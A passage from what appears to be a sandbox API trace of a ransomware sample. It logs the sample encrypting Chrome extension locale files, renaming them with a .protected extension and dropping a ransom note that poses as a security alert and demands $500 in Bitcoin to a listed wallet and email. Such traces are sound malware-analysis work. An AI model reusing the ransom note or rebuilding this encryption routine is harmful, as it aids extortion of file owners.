[0080.330] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.330] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.330] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json") returned 155 [0080.330] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.330] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.330] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.330] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.330] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.331] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json") returned 155 [0080.331] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.331] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json") returned 155 [0080.331] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.331] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json") returned 155 [0080.331] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.331] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x103, lpOverlapped=0x0) returned 1 [0080.332] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffefd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.332] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x103, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x103, lpOverlapped=0x0) returned 1 [0080.332] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.332] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.332] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.332] CloseHandle (hObject=0x168) returned 1 [0080.333] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json.protected") returned 165 [0080.333] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\messages.json.protected")) returned 1 [0080.333] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.333] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.334] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\RESTORE_FILES.txt") returned 159 [0080.334] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.334] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.334] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.335] lstrlenA (lpString="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") returned 684 [0080.335] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0080.335] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.335] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.335] CloseHandle (hObject=0x164) returned 1 [0080.335] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.335] lstrcmpiW (lpString1="ar", lpString2="Windows") returned -1 [0080.335] lstrcmpiW (lpString1="ar", lpString2="Program Files") returned -1 [0080.335] lstrcmpiW (lpString1="ar", lpString2="Program Files (x86)") returned -1 [0080.336] lstrcmpiW (lpString1="ar", lpString2="$Recycle.bin") returned 1 [0080.336] lstrcmpiW (lpString1="ar", lpString2="System Volume Information") returned -1 [0080.336] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar") returned 141 [0080.336] lstrcmpW (lpString1="ar", lpString2=".") returned 1 [0080.336] lstrcmpW (lpString1="ar", lpString2="..") returned 1 [0080.336] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\*") returned 143 [0080.336] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.338] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.338] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.338] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.338] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.339] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.339] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\.") returned 143 [0080.339] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.339] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.339] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.339] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.339] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.339] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.339] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.339] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\..") returned 144 [0080.339] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.339] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.339] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.339] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.339] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.339] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned 
-1 [0080.339] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.339] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.339] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json") returned 155 [0080.339] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.339] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.339] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.339] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.340] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json") returned 155 [0080.340] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.340] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json") returned 155 [0080.340] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.340] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json") returned 155 [0080.340] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.340] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xed, lpOverlapped=0x0) returned 1 [0080.341] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.341] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xed, lpOverlapped=0x0) returned 1 [0080.341] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.341] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.342] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.342] CloseHandle (hObject=0x168) returned 1 [0080.342] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json.protected") returned 165 [0080.342] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\messages.json.protected")) returned 1 [0080.343] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.343] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.343] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\RESTORE_FILES.txt") returned 159 [0080.343] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.344] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.344] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.345] lstrlenA (lpString="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") returned 684 [0080.345] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0080.345] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.345] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.345] CloseHandle (hObject=0x164) returned 1 [0080.345] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.345] lstrcmpiW (lpString1="az", lpString2="Windows") returned -1 [0080.345] lstrcmpiW (lpString1="az", lpString2="Program Files") returned -1 [0080.345] lstrcmpiW (lpString1="az", lpString2="Program Files (x86)") returned -1 [0080.345] lstrcmpiW (lpString1="az", lpString2="$Recycle.bin") returned 1 [0080.345] lstrcmpiW (lpString1="az", lpString2="System Volume Information") returned -1 [0080.345] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az") returned 141 [0080.345] lstrcmpW (lpString1="az", lpString2=".") returned 1 [0080.345] lstrcmpW (lpString1="az", lpString2="..") returned 1 [0080.345] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\*") returned 143 [0080.345] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.346] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.346] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.346] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.346] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.346] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.346] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\.") returned 143 [0080.346] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.346] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.346] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.346] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.346] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.346] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.346] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.346] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\..") returned 144 [0080.346] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.346] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.346] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.346] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.346] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.346] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned 
-1 [0080.346] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.346] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.346] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json") returned 155 [0080.346] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.346] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.346] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.347] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.347] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\az\\messages.json") returned 155 [0080.347] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
